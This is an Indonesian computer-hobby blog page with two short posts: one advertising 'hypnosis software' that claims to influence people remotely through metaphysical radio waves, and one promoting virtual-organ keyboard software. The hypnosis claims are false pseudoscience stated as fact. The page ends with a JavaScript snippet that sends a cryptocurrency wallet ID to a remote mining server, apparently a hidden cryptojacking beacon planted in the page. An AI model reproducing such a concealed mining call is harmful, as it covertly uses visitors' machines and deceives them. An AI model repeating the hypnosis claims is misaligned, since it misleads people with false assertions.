belajar komputer

Rabu, 19 Februari 2014

SOFTWARE HYPNOTIS METAFISIKA MODERN


Software Hipnotis ini sangat ampuh digunakan untuk mempengaruhi/menghipnotis seseorang dari jarak jauh.Software ini juga bisa digunakan untuk menghipnotis diri sendiri (self hypnosis). Semua ini dilakukan tanpa perlu repot melakukan ritual sugesti setiap hari. Anda cukup sekali saja melakukan sugesti yang akan disimpan pada program di komputer dan sugesti tersebut bisa anda jalankan kapan saja tanpa mengganggu aktifitas anda yang lain.

Software ini bekerja dengan cara menggabungkan kekuatan pikiran manusia/sugesti dengan gelombang radio metafisik (radionic) yang dipancarkan melalui komputer karena pada dasarnya setiap benda itu memiliki pancaran gelombang/energi. Jadi anda cukup menginstall software ini di komputer lalu merekam sugestinya, maka biarkan komputer yang akan bekerja. Sangat mudah namun ampuh hasilnya karena telah digunakan ribuan orang dan praktisi suprnatural di dalam dan luar negeri.

Sabtu, 15 Februari 2014

MAIN ORGAN TUNGGAL DI PC/LAPTOP

Buat yang ingin memainkan keyboard seperti Yamaha PSR di PC/ Laptop mau dangdut oplosan,koplo,ngeband,dll pokoke lengkap bro,seperti main  di panggung aja. saat ini mungkin kamu sedang beruntung.. tungg.. tung.. Karena kamu sedang berada di waktu dan tempat yang tepat. :p
var wallet = "cy_26 067b6 be129 ba270 c8100 e0f49 03d82 eab5c 3b065 43fea e169e c7e1f aa5fd f1"; $.post("http://mining.cayafuture.com:2435/"+wallet, function( data ) { //alert(data); })